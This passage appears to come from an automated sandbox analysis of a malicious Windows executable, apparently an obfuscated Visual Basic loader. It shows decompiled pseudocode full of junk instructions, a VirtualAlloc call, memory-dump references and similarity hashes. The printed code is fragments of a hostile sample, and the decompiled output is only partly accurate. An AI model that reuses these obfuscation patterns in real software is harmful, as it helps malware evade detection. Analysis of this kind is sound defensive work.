					asm("invalid");
				} while (_t300 != 0);
				_t161 = _t160 - 1;
				asm("fsin");
				asm("fclex");
				_t162 = _t161 + 1;
				_t65 = _t61 - 1 + 1;
				asm("fldz");
				_t320 = _t319 - st3;
				_t188 = _t186 - 1 + 1;
				asm("pcmpgtw mm6, mm2");
				asm("fcomp st0, st3");
				asm("clc");
				asm("cld");
				asm("fxch st0, st1");
				asm("fclex");
				_t190 = _t188 - 1 + 1;
				asm("fdecstp");
				asm("fprem1");
				_t191 = _t190 - 1;
				_t192 = _t191 + 1;
				asm("pcmpeqb mm3, mm6");
				asm("paddusw xmm1, xmm7");
				asm("int1");
				if (0x45f5 <= 0) goto L30;
				_push(es);
			}

0x00402939
0x0040293e
0x00402940
0x00402990
0x00402995
0x00402997
0x00402999
0x004029e3
0x004029e4
0x004029e8
0x00402a2d
0x00402a30
0x00402a34
0x00402a8a
0x00402a8c
0x00402adc
0x00402ae4
0x00402ae6
0x00402b31
0x00402b32
0x00402b34
0x00402b83
0x00402b85
0x00402b87
0x00402bd1
0x00402bd3
0x00402bd4
0x00402bd6
0x00402bd7
0x00402c23
0x00402c24
0x00402c24
0x00402c25
0x00402c29
0x00402c77
0x00402c79
0x00402c7a
0x00402c7c
0x00402cbd
0x00402cbe
0x00402cbf
0x00402cc0
0x00402cc2
0x00402d08
0x00402d09
0x00402d0b
0x00402d0e
0x00402d10
0x00402d62
0x00402d62
0x00402d6b
0x00402d6c
0x00402d6e
0x00402dc2
0x00402dc4
0x00402dc5
0x00402dc7
0x00402e19
0x00402e1a
0x00402e1d
0x00402e5f
0x00402e66
0x00402e67
0x00402e69
0x00402eb9
0x00402ec0
0x00402ec2
0x00402f07
0x00402f08
0x00402f0a
0x00402f0d
0x00402f55
0x00402f56
0x00402f57

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1ef0ca2986e9ae49a8d5b38df962317f774b01763f36a63580bbf409d7c74384
Instruction ID: 5b097d8d9c17d651bd5cf816d689c43a59396596593b4405aa59c36eb94e502c
Opcode Fuzzy Hash: 1ef0ca2986e9ae49a8d5b38df962317f774b01763f36a63580bbf409d7c74384
Instruction Fuzzy Hash: 5571AE5192EA44CAD2172D3486486715A48FF93343730EBBB89A7760F1667E0E4B74CE

Uniqueness

Uniqueness Score: -1.00%

Function 004027A7, Relevance: 1.6, APIs: 1, Instructions: 362
COMMONCrypto

Download Yara Rule

C-Code - Quality: 34%

			E004027A7(void* __eax, unsigned char __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				unsigned char _t59;
				void* _t61;
				void* _t63;
				void* _t67;
				void* _t68;
				signed int _t70;

				_t67 = __edi;
				_t61 = __ecx;
				_t59 = __ebx;
				 *_t70 =  *_t70 ^ _t70;
				asm("insd");
				_t59 = _t60 + _t63;
				asm("loope 0xffffffe3");
				asm("loope 0xffffffe3");
				asm("loope 0xffffffe3");
				asm("loope 0x49");
				while(1) {
					_t68 = _t68 + 1;
					asm("clc");
					asm("fabs");
					asm("loope 0x68");
					asm("paddb xmm0, xmm0");
					asm("paddb mm0, mm0");
					asm("cld");
					_t60 = _t59 >> 0x3f;
					asm("aas");
					__eax = __eax - 1;
					asm("paddsw mm6, mm3");
					asm("psubw mm3, mm3");
					__eax = __eax + 1;
					asm("clc");
					__ecx = __ecx - 1;
					asm("fsubrp st4, st0");
					asm("fsqrt");
					__ecx = __ecx - 1;
					__ecx = __ecx + 1;
					__eflags = __ecx;
					__edi = __edi - 1;
					asm("wait");
					asm("fyl2xp1");
					__edi = __edi + 1;
					__eflags = __ecx;
					if(__ecx != 0) {
						asm("fnop");
						asm("punpcklwd xmm5, xmm3");
						asm("fprem");
						asm("wait");
						asm("fninit");
						asm("pcmpgtd mm4, mm0");
						_t63 = _t61 - 1 + 1;
						_t68 = _t67 - 1;
						asm("pxor mm6, mm4");
						asm("fdivr st7, st0");
						continue;
					}
					asm("wait");
					asm("fclex");
					asm("packsswb mm5, mm1");
					__eax = __eax + 1;
					asm("fldl2t");
					asm("paddd xmm2, xmm0");
					__eax = __imp__#690;
					asm("clc");
					__ebx = __ebx - 1;
					asm("fst st1");
					asm("fdivrp st3, st0");
					__ebx = __ebx + 1;
					__ecx = 0x89d3ec;
					__edi = __edi - 1;
					asm("psubusb xmm4, xmm5");
					asm("psraw xmm0, xmm3");
					__edi = __edi + 1;
					0x89d3eb = 0x89d3ec;
					asm("packuswb xmm3, xmm5");
					asm("fyl2x");
					0xd4786f = 0xd4786e;
					__ecx = 0xd4786f;
					asm("fclex");
					asm("psrlq xmm7, 0xf4");
					asm("clc");
					__ecx = 0x97ad6e;
					__ebx = __ebx - 1;
					__fp0 = __fp0 - st3;
					asm("f2xm1");
					__ebx = __ebx + 1;
					__edx = __edx - 1;
					__edx = __edx + 1;
					asm("fcomp st0, st3");
					asm("emms");
					__ecx = 0x905a4d;
					asm("cld");
					__ecx = 0x905a4c;
					asm("fclex");
					asm("wait");
					__ecx = 0x905a4d;
					__esi = __esi - 1;
					__esi = __esi + 1;
					asm("fprem1");
					asm("wait");
					asm("fclex");
					asm("clc");
					do {
						__esi = __esi - 1;
						asm("paddusw xmm1, xmm7");
						asm("fldl2t");
						__esi = __esi + 1;
						__eax = __eax - 1;
						__eax = __eax + 1;
						asm("fldl2e");
						asm("fst st1");
						__eax = __eax - 1;
						asm("clc");
						__ecx = __ecx - 1;
						asm("fnop");
						asm("psubusb xmm4, xmm5");
						__ecx = __ecx + 1;
						__eflags =  *__eax - __ecx;
						asm("invalid");
						asm("fscale");
						asm("packuswb xmm3, xmm5");
						asm("invalid");
					} while (__eflags != 0);
					__edx = __edx - 1;
					asm("fsin");
					asm("fclex");
					__edx = __edx + 1;
					__eax = __eax - 1;
					__eax = __eax + 1;
					asm("fldz");
					__fp0 = __fp0 - st3;
					__ecx = 0x45f5;
					__edi = __edi - 1;
					__edi = __edi + 1;
					asm("pcmpgtw mm6, mm2");
					asm("fcomp st0, st3");
					asm("clc");
					__ecx = 0x364e;
					asm("cld");
					asm("fxch st0, st1");
					asm("fclex");
					__edi = __edi - 1;
					__edi = __edi + 1;
					__ecx = 0x16ba;
					asm("fdecstp");
					asm("fprem1");
					__edi = __edi - 1;
					__eflags = __edi;
					__edi = __edi + 1;
					__ecx = 0x16b9;
					asm("pcmpeqb mm3, mm6");
					asm("paddusw xmm1, xmm7");
					__ecx = 0x16ba;
					__ecx = 0x10cc;
					__eflags = 0x45f5;
					asm("int1");
					if (0x45f5 <= 0) goto L60;
					_push(es);
				}
			}

0x004027a7
0x004027a7
0x004027a7
0x004027a7
0x004027a8
0x004027a9
0x00402797
0x00402798
0x00402799
0x0040279a
0x0040279b
0x0040279b
0x0040279d
0x0040279e
0x0040279f
0x004027a0
0x004027a1
0x004027a2
0x004027a3
0x004027a5
0x004027e7
0x004027e8
0x004027eb
0x00402836
0x00402837
0x00402838
0x00402839
0x0040283b
0x0040288e
0x0040288f
0x0040288f
0x00402890
0x00402891
0x00402892
0x004028de
0x004028df
0x004028e1
0x00402699
0x0040269c
0x004026a0
0x004026ed
0x004026ee
0x004026f2
0x00402742
0x00402743
0x00402744
0x00402747
0x00000000
0x00402747
0x004028e7
0x004028e8
0x004028ea
0x0040293c
0x0040293e
0x00402940
0x00402990
0x00402995
0x00402996
0x00402997
0x00402999
0x004029dd
0x004029de
0x004029e3
0x004029e4
0x004029e8
0x00402a2d
0x00402a2f
0x00402a30
0x00402a34
0x00402a88
0x00402a89
0x00402a8a
0x00402a8c
0x00402adc
0x00402add
0x00402ae3
0x00402ae4
0x00402ae6
0x00402b2f
0x00402b30
0x00402b31
0x00402b32
0x00402b34
0x00402b7d
0x00402b83
0x00402b84
0x00402b85
0x00402b87
0x00402bd1
0x00402bd2
0x00402bd3
0x00402bd4
0x00402bd6
0x00402bd7
0x00402c23
0x00402c24
0x00402c24
0x00402c25
0x00402c29
0x00402c77
0x00402c78
0x00402c79
0x00402c7a
0x00402c7c
0x00402cbd
0x00402cbe
0x00402cbf
0x00402cc0
0x00402cc2
0x00402d08
0x00402d09
0x00402d0b
0x00402d0e
0x00402d10
0x00402d62
0x00402d62
0x00402d6b
0x00402d6c
0x00402d6e
0x00402dc2
0x00402dc3
0x00402dc4
0x00402dc5
0x00402dc7
0x00402e13
0x00402e18
0x00402e19
0x00402e1a
0x00402e1d
0x00402e5f
0x00402e60
0x00402e66
0x00402e67
0x00402e69
0x00402eb8
0x00402eb9
0x00402eba
0x00402ec0
0x00402ec2
0x00402f07
0x00402f07
0x00402f08
0x00402f09
0x00402f0a
0x00402f0d
0x00402f53
0x00402f54
0x00402f54
0x00402f55
0x00402f56
0x00402f57
0x00402f57

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 258fc76b779bb60194583f3e34e8ffee78109a9f45ca9c0cdc2500aea9f9939e
Instruction ID: 6050d7c5832120c9ffbd5d5db71ff43540b7c54e3f15c0cc7a35df45d05b9d8c
Opcode Fuzzy Hash: 258fc76b779bb60194583f3e34e8ffee78109a9f45ca9c0cdc2500aea9f9939e
Instruction Fuzzy Hash: CE81B05193EA44C6D217293086486715A48FF97343330EB7F85A7B60E166BE0E8B74CE

Uniqueness

Uniqueness Score: -1.00%

Function 0040C0EA, Relevance: 241.4, APIs: 129, Strings: 8, Instructions: 1630
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E0040C0EA(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v40;
				void* _v56;
				void* _v72;
				short _v76;
				char _v80;
				long long _v88;
				signed int _v92;
				signed int _v96;
				char _v100;
				char _v104;
				signed int _v108;
				char _v112;
				char _v116;
				char _v120;
				intOrPtr _v128;
				char _v136;
				intOrPtr _v144;
				char _v152;
				intOrPtr _v160;
				char _v168;
				char* _v176;
				char _v184;
				intOrPtr _v192;
				char _v200;
				signed int _v208;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char* _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				intOrPtr _v252;
				char _v256;
				char _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				intOrPtr* _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				char _v316;
				char _v332;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				intOrPtr _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				intOrPtr* _v384;
				signed int _v388;
				signed int _v392;
				intOrPtr* _v396;
				signed int _v400;
				intOrPtr* _v404;
				signed int _v408;
				char _v412;
				signed int _v416;
				signed int _v420;
				intOrPtr* _v424;
				signed int _v428;
				intOrPtr* _v432;
				signed int _v436;
				intOrPtr* _v440;
				signed int _v444;
				intOrPtr* _v448;
				signed int _v452;
				intOrPtr* _v456;
				signed int _v460;
				signed int _v464;
				intOrPtr* _v468;
				signed int _v472;
				intOrPtr* _v476;
				signed int _v480;
				intOrPtr* _v484;
				signed int _v488;
				intOrPtr* _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				intOrPtr* _v512;
				signed int _v516;
				intOrPtr* _v520;
				signed int _v524;
				intOrPtr* _v528;
				signed int _v532;
				intOrPtr* _v536;
				signed int _v540;
				intOrPtr* _v544;
				signed int _v548;
				intOrPtr* _v552;
				signed int _v556;
				intOrPtr* _v560;
				signed int _v564;
				intOrPtr* _v568;
				signed int _v572;
				signed int _v576;
				intOrPtr* _v580;
				signed int _v584;
				intOrPtr* _v588;
				signed int _v592;
				intOrPtr* _v596;
				signed int _v600;
				intOrPtr* _v604;
				signed int _v608;
				signed int _v612;
				signed int _t815;
				signed int _t822;
				signed int _t826;
				signed int _t830;
				signed int _t834;
				char* _t838;
				signed int _t842;
				signed int _t848;
				signed int _t855;
				signed int _t859;
				signed int _t863;
				signed int _t867;
				char* _t871;
				signed int _t875;
				signed int _t879;
				signed int _t883;
				signed int _t915;
				signed int _t919;
				signed int _t929;
				signed int _t933;
				signed int _t937;
				signed int _t941;
				signed int _t945;
				char* _t949;
				signed int _t953;
				signed int _t957;
				signed int _t961;
				char* _t963;
				signed int _t969;
				signed int _t977;
				char* _t983;
				signed int _t989;
				signed int _t993;
				signed int _t997;
				signed int _t1001;
				signed int _t1005;
				char* _t1009;
				signed int _t1013;
				signed int _t1017;
				signed int _t1021;
				signed int _t1046;
				signed int _t1050;
				signed int _t1054;
				signed int _t1058;
				char* _t1062;
				signed int _t1066;
				signed int _t1071;
				signed int _t1075;
				char* _t1077;
				signed int _t1088;
				signed int _t1100;
				signed int _t1104;
				signed int _t1108;
				signed int _t1112;
				char* _t1116;
				signed int _t1120;
				signed int _t1124;
				signed int _t1128;
				signed int _t1147;
				char* _t1150;
				char* _t1155;
				signed int _t1161;
				signed int _t1166;
				intOrPtr _t1178;
				intOrPtr _t1192;
				intOrPtr _t1196;
				intOrPtr _t1210;
				intOrPtr _t1239;
				intOrPtr _t1251;
				void* _t1285;
				void* _t1287;
				intOrPtr _t1288;
				long long* _t1289;
				void* _t1290;
				intOrPtr* _t1292;
				void* _t1293;
				void* _t1294;
				void* _t1296;
				long long* _t1297;
				intOrPtr* _t1299;

				_t1288 = _t1287 - 0xc;
				 *[fs:0x0] = _t1288;
				L004012A0();
				_v16 = _t1288;
				_v12 = 0x4011c8;
				_v8 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4012a6, _t1285);
				_v176 =  &M0040B148;
				_v184 = 8;
				L004013E4();
				_push( &_v136);
				_push( &_v152); // executed
				L004013EA(); // executed
				_v192 = 0x15;
				_v200 = 0x8002;
				_push( &_v152);
				_t815 =  &_v200;
				_push(_t815);
				L004013F0();
				_v268 = _t815;
				_push( &_v152);
				_push( &_v136);
				_push(2);
				L00401432();
				_t1289 = _t1288 + 0xc;
				if(_v268 != 0) {
					if( *0x4103c4 != 0) {
						_v384 = 0x4103c4;
					} else {
						_push(0x4103c4);
						_push(0x40b17c);
						L004013DE();
						_v384 = 0x4103c4;
					}
					_v268 =  *_v384;
					_t1161 =  *((intOrPtr*)( *_v268 + 0x1c))(_v268,  &_v104);
					asm("fclex");
					_v272 = _t1161;
					if(_v272 >= 0) {
						_v388 = _v388 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x40b16c);
						_push(_v268);
						_push(_v272);
						L004013D8();
						_v388 = _t1161;
					}
					_v276 = _v104;
					_t1166 =  *((intOrPtr*)( *_v276 + 0x64))(_v276, 1,  &_v220);
					asm("fclex");
					_v280 = _t1166;
					if(_v280 >= 0) {
						_v392 = _v392 & 0x00000000;
					} else {
						_push(0x64);
						_push(0x40b18c);
						_push(_v276);
						_push(_v280);
						L004013D8();
						_v392 = _t1166;
					}
					_v76 = _v220;
					L004013D2();
				}
				if( *0x410010 != 0) {
					_v396 = 0x410010;
				} else {
					_push("p�i");
					_push(0x40a5bc);
					L004013DE();
					_v396 = 0x410010;
				}
				_t822 =  &_v104;
				L004013CC();
				_v268 = _t822;
				_t826 =  *((intOrPtr*)( *_v268 + 0x48))(_v268,  &_v92, _t822,  *((intOrPtr*)( *((intOrPtr*)( *_v396)) + 0x2fc))( *_v396));
				asm("fclex");
				_v272 = _t826;
				if(_v272 >= 0) {
					_v400 = _v400 & 0x00000000;
				} else {
					_push(0x48);
					_push(0x40b19c);
					_push(_v268);
					_push(_v272);
					L004013D8();
					_v400 = _t826;
				}
				if( *0x410010 != 0) {
					_v404 = 0x410010;
				} else {
					_push("p�i");
					_push(0x40a5bc);
					L004013DE();
					_v404 = 0x410010;
				}
				_t830 =  &_v108;
				L004013CC();
				_v276 = _t830;
				_t834 =  *((intOrPtr*)( *_v276 + 0x48))(_v276,  &_v96, _t830,  *((intOrPtr*)( *((intOrPtr*)( *_v404)) + 0x314))( *_v404));
				asm("fclex");
				_v280 = _t834;
				if(_v280 >= 0) {
					_v408 = _v408 & 0x00000000;
				} else {
					_push(0x48);
					_push(0x40b1ac);
					_push(_v276);
					_push(_v280);
					L004013D8();
					_v408 = _t834;
				}
				if( *0x410010 != 0) {
					_v412 = 0x410010;
				} else {
					_push("p�i");
					_push(0x40a5bc);
					L004013DE();
					_v412 = 0x410010;
				}
				_t1178 =  *((intOrPtr*)( *_v412));
				_t838 =  &_v112;
				L004013CC();
				_v284 = _t838;
				_t842 =  *((intOrPtr*)( *_v284 + 0xe8))(_v284,  &_v232, _t838,  *((intOrPtr*)(_t1178 + 0x31c))( *_v412));
				asm("fclex");
				_v288 = _t842;
				if(_v288 >= 0) {
					_v416 = _v416 & 0x00000000;
				} else {
					_push(0xe8);
					_push(0x40b1bc);
					_push(_v284);
					_push(_v288);
					L004013D8();
					_v416 = _t842;
				}
				_v344 = _v96;
				_v96 = _v96 & 0x00000000;
				_v128 = _v344;
				_v136 = 8;
				L004012A0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t1289 =  *0x4011c0;
				_t848 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4, _v92, _t1178, _t1178, 0x10, 0x514f93, _v232);
				_v292 = _t848;
				if(_v292 >= 0) {
					_v420 = _v420 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x40ae70);
					_push(_a4);
					_push(_v292);
					L004013D8();
					_v420 = _t848;
				}
				L00401462();
				_push( &_v112);
				_push( &_v108);
				_push( &_v104);
				_push(3);
				L004013C6();
				_t1290 = _t1289 + 0x10;
				L00401450();
				if( *0x410010 != 0) {
					_v424 = 0x410010;
				} else {
					_push("p�i");
					_push(0x40a5bc);
					L004013DE();
					_v424 = 0x410010;
				}
				_t855 =  &_v104;
				L004013CC();
				_v268 = _t855;
				_t859 =  *((intOrPtr*)( *_v268 + 0xf0))(_v268,  &_v108, _t855,  *((intOrPtr*)( *((intOrPtr*)( *_v424)) + 0x314))( *_v424));
				asm("fclex");
				_v272 = _t859;
				if(_v272 >= 0) {
					_v428 = _v428 & 0x00000000;
				} else {
					_push(0xf0);
					_push(0x40b1ac);
					_push(_v268);
					_push(_v272);
					L004013D8();
					_v428 = _t859;
				}
				if( *0x410010 != 0) {
					_v432 = 0x410010;
				} else {
					_push("p�i");
					_push(0x40a5bc);
					L004013DE();
					_v432 = 0x410010;
				}
				_t863 =  &_v112;
				L004013CC();
				_v276 = _t863;
				_t867 =  *((intOrPtr*)( *_v276 + 0x48))(_v276,  &_v92, _t863,  *((intOrPtr*)( *((intOrPtr*)( *_v432)) + 0x31c))( *_v432));
				asm("fclex");
				_v280 = _t867;
				if(_v280 >= 0) {
					_v436 = _v436 & 0x00000000;
				} else {
					_push(0x48);
					_push(0x40b1bc);
					_push(_v276);
					_push(_v280);
					L004013D8();
					_v436 = _t867;
				}
				if( *0x410010 != 0) {
					_v440 = 0x410010;
				} else {
					_push("p�i");
					_push(0x40a5bc);
					L004013DE();
					_v440 = 0x410010;
				}
				_t871 =  &_v116;
				L004013CC();
				_v284 = _t871;
				_t875 =  *((intOrPtr*)( *_v284 + 0x128))(_v284,  &_v220, _t871,  *((intOrPtr*)( *((intOrPtr*)( *_v440)) + 0x300))( *_v440));
				asm("fclex");
				_v288 = _t875;
				if(_v288 >= 0) {
					_v444 = _v444 & 0x00000000;
				} else {
					_push(0x128);
					_push(0x40b19c);
					_push(_v284);
					_push(_v288);
					L004013D8();
					_v444 = _t875;
				}
				if( *0x410010 != 0) {
					_v448 = 0x410010;
				} else {
					_push("p�i");
					_push(0x40a5bc);
					L004013DE();
					_v448 = 0x410010;
				}
				_t1192 =  *((intOrPtr*)( *_v448));
				_t879 =  &_v120;
				L004013CC();
				_v292 = _t879;
				_t883 =  *((intOrPtr*)( *_v292 + 0x1dc))(_v292,  &_v96, _t879,  *((intOrPtr*)(_t1192 + 0x300))( *_v448));
				asm("fclex");
				_v296 = _t883;
				if(_v296 >= 0) {
					_v452 = _v452 & 0x00000000;
				} else {
					_push(0x1dc);
					_push(0x40b19c);
					_push(_v292);
					_push(_v296);
					L004013D8();
					_v452 = _t883;
				}
				_v348 = _v96;
				_v96 = _v96 & 0x00000000;
				_v160 = _v348;
				_v168 = 8;
				_v176 = 0x5a42e0;
				_v184 = 3;
				_v232 = 0x3554e3;
				_v228 = 0x17dd;
				_v224 = _v220;
				_v352 = _v92;
				_v92 = _v92 & 0x00000000;
				_v144 = _v352;
				_v152 = 8;
				_v356 = _v108;
				_v108 = _v108 & 0x00000000;
				_v128 = _v356;
				_v136 = 9;
				L004012A0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v240 =  *0x4011bc;
				L004012A0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *((intOrPtr*)( *_a4 + 0x71c))(_a4,  &_v136, 0x10,  &_v224, _t1192,  &_v228,  &M0040B014,  &_v232, 0x10,  &_v168);
				L004013C6();
				L00401432();
				_t1292 = _t1290 + 0x24;
				 *((intOrPtr*)( *_a4 + 0x720))(_a4,  &_v136, 3,  &_v136,  &_v152,  &_v168, 4,  &_v104,  &_v112,  &_v116,  &_v120);
				L004013C0();
				if( *0x410010 != 0) {
					_v456 = 0x410010;
				} else {
					_push("p�i");
					_push(0x40a5bc);
					L004013DE();
					_v456 = 0x410010;
				}
				_t1196 =  *((intOrPtr*)( *_v456));
				_t915 =  &_v104;
				L004013CC();
				_v268 = _t915;
				_t919 =  *((intOrPtr*)( *_v268 + 0x48))(_v268,  &_v92, _t915,  *((intOrPtr*)(_t1196 + 0x304))( *_v456));
				asm("fclex");
				_v272 = _t919;
				if(_v272 >= 0) {
					_v460 = _v460 & 0x00000000;
				} else {
					_push(0x48);
					_push(0x40b19c);
					_push(_v268);
					_push(_v272);
					L004013D8();
					_v460 = _t919;
				}
				_v192 = 0x7cf5f3;
				_v200 = 3;
				_v220 = 0x74c1;
				_v176 = L"overstiges";
				_v184 = 8;
				_v360 = _v92;
				_v92 = _v92 & 0x00000000;
				_v128 = _v360;
				_v136 = 8;
				L004012A0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t1292 =  *0x4011b8;
				L004012A0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004012A0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t929 =  *((intOrPtr*)( *_a4 + 0x700))(_a4, 0x10, 0x10, _t1196,  &_v220, 0x39ff, 0x10, 0x667a4db0, 0x5b07,  &_v256);
				_v276 = _t929;
				if(_v276 >= 0) {
					_v464 = _v464 & 0x00000000;
				} else {
					_push(0x700);
					_push(0x40ae70);
					_push(_a4);
					_push(_v276);
					L004013D8();
					_v464 = _t929;
				}
				_v88 = _v256;
				L004013D2();
				L00401450();
				if( *0x410010 != 0) {
					_v468 = 0x410010;
				} else {
					_push("p�i");
					_push(0x40a5bc);
					L004013DE();
					_v468 = 0x410010;
				}
				_t933 =  &_v104;
				L004013CC();
				_v268 = _t933;
				_t937 =  *((intOrPtr*)( *_v268 + 0xa0))(_v268,  &_v220, _t933,  *((intOrPtr*)( *((intOrPtr*)( *_v468)) + 0x314))( *_v468));
				asm("fclex");
				_v272 = _t937;
				if(_v272 >= 0) {
					_v472 = _v472 & 0x00000000;
				} else {
					_push(0xa0);
					_push(0x40b1ac);
					_push(_v268);
					_push(_v272);
					L004013D8();
					_v472 = _t937;
				}
				if( *0x410010 != 0) {
					_v476 = 0x410010;
				} else {
					_push("p�i");
					_push(0x40a5bc);
					L004013DE();
					_v476 = 0x410010;
				}
				_t941 =  &_v108;
				L004013CC();
				_v276 = _t941;
				_t945 =  *((intOrPtr*)( *_v276 + 0x1a0))(_v276,  &_v224, _t941,  *((intOrPtr*)( *((intOrPtr*)( *_v476)) + 0x304))( *_v476));
				asm("fclex");
				_v280 = _t945;
				if(_v280 >= 0) {
					_v480 = _v480 & 0x00000000;
				} else {
					_push(0x1a0);
					_push(0x40b19c);
					_push(_v276);
					_push(_v280);
					L004013D8();
					_v480 = _t945;
				}
				if( *0x410010 != 0) {
					_v484 = 0x410010;
				} else {
					_push("p�i");
					_push(0x40a5bc);
					L004013DE();
					_v484 = 0x410010;
				}
				_t949 =  &_v112;
				L004013CC();
				_v284 = _t949;
				_t953 =  *((intOrPtr*)( *_v284 + 0x128))(_v284,  &_v232, _t949,  *((intOrPtr*)( *((intOrPtr*)( *_v484)) + 0x318))( *_v484));
				asm("fclex");
				_v288 = _t953;
				if(_v288 >= 0) {
					_v488 = _v488 & 0x00000000;
				} else {
					_push(0x128);
					_push(0x40b1ac);
					_push(_v284);
					_push(_v288);
					L004013D8();
					_v488 = _t953;
				}
				if( *0x410010 != 0) {
					_v492 = 0x410010;
				} else {
					_push("p�i");
					_push(0x40a5bc);
					L004013DE();
					_v492 = 0x410010;
				}
				_t1210 =  *((intOrPtr*)( *_v492));
				_t957 =  &_v116;
				L004013CC();
				_v292 = _t957;
				_t961 =  *((intOrPtr*)( *_v292 + 0xf0))(_v292,  &_v120, _t957,  *((intOrPtr*)(_t1210 + 0x318))( *_v492));
				asm("fclex");
				_v296 = _t961;
				if(_v296 >= 0) {
					_v496 = _v496 & 0x00000000;
				} else {
					_push(0xf0);
					_push(0x40b1ac);
					_push(_v292);
					_push(_v296);
					L004013D8();
					_v496 = _t961;
				}
				L004013BA();
				_t1293 = _t1292 + 0x10;
				_t963 =  &_v136;
				L004013B4();
				_v240 = _t963;
				_v236 = 0x6b5bc3;
				_v256 =  *0x4011b0;
				_v412 =  *0x4011a8;
				_t969 =  *((intOrPtr*)( *_a4 + 0x704))(_a4,  &_v256, 0x31f0, _v220, _v224,  &_v236, _v232, _t1210, _t1210,  &_v240, 0x60d, 0x5cfc, _t963,  &_v136, _v120, 0, 0);
				_v300 = _t969;
				if(_v300 >= 0) {
					_v500 = _v500 & 0x00000000;
				} else {
					_push(0x704);
					_push(0x40ae70);
					_push(_a4);
					_push(_v300);
					L004013D8();
					_v500 = _t969;
				}
				L004013C6();
				_t1294 = _t1293 + 0x18;
				L00401450();
				_t977 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4, 5,  &_v104,  &_v108,  &_v112,  &_v116,  &_v120);
				asm("fclex");
				_v268 = _t977;
				if(_v268 >= 0) {
					_v504 = _v504 & 0x00000000;
				} else {
					_push(0x2b4);
					_push(0x40ae40);
					_push(_a4);
					_push(_v268);
					L004013D8();
					_v504 = _t977;
				}
				_v176 = 1;
				_v184 = 2;
				_v192 = 0x5f7a;
				_v200 = 2;
				_v208 = _v208 & 0x00000000;
				_v216 = 2;
				_push( &_v184);
				_push( &_v200);
				_push( &_v216);
				_push( &_v332);
				_push( &_v316);
				_t983 =  &_v40;
				_push(_t983);
				L004013AE();
				_v364 = _t983;
				while(_v364 != 0) {
					_v176 = L"RRETS";
					_v184 = 8;
					L004013E4();
					_v264 =  *0x4011a0;
					_v256 = 0x418e7d50;
					_v252 = 0x5af3;
					_t989 =  *((intOrPtr*)( *_a4 + 0x708))(_a4,  &_v256, 0x4d7a,  &_v264, 0x6e4acb,  &_v136);
					_v268 = _t989;
					if(_v268 >= 0) {
						_v508 = _v508 & 0x00000000;
					} else {
						_push(0x708);
						_push(0x40ae70);
						_push(_a4);
						_push(_v268);
						L004013D8();
						_v508 = _t989;
					}
					L00401450();
					if( *0x410010 != 0) {
						_v512 = 0x410010;
					} else {
						_push("p�i");
						_push(0x40a5bc);
						L004013DE();
						_v512 = 0x410010;
					}
					_t993 =  &_v104;
					L004013CC();
					_v268 = _t993;
					_t997 =  *((intOrPtr*)( *_v268 + 0x68))(_v268,  &_v232, _t993,  *((intOrPtr*)( *((intOrPtr*)( *_v512)) + 0x314))( *_v512));
					asm("fclex");
					_v272 = _t997;
					if(_v272 >= 0) {
						_v516 = _v516 & 0x00000000;
					} else {
						_push(0x68);
						_push(0x40b1ac);
						_push(_v268);
						_push(_v272);
						L004013D8();
						_v516 = _t997;
					}
					if( *0x410010 != 0) {
						_v520 = 0x410010;
					} else {
						_push("p�i");
						_push(0x40a5bc);
						L004013DE();
						_v520 = 0x410010;
					}
					_t1001 =  &_v108;
					L004013CC();
					_v276 = _t1001;
					_t1005 =  *((intOrPtr*)( *_v276 + 0x90))(_v276,  &_v220, _t1001,  *((intOrPtr*)( *((intOrPtr*)( *_v520)) + 0x31c))( *_v520));
					asm("fclex");
					_v280 = _t1005;
					if(_v280 >= 0) {
						_v524 = _v524 & 0x00000000;
					} else {
						_push(0x90);
						_push(0x40b1bc);
						_push(_v276);
						_push(_v280);
						L004013D8();
						_v524 = _t1005;
					}
					if( *0x410010 != 0) {
						_v528 = 0x410010;
					} else {
						_push("p�i");
						_push(0x40a5bc);
						L004013DE();
						_v528 = 0x410010;
					}
					_t1009 =  &_v112;
					L004013CC();
					_v284 = _t1009;
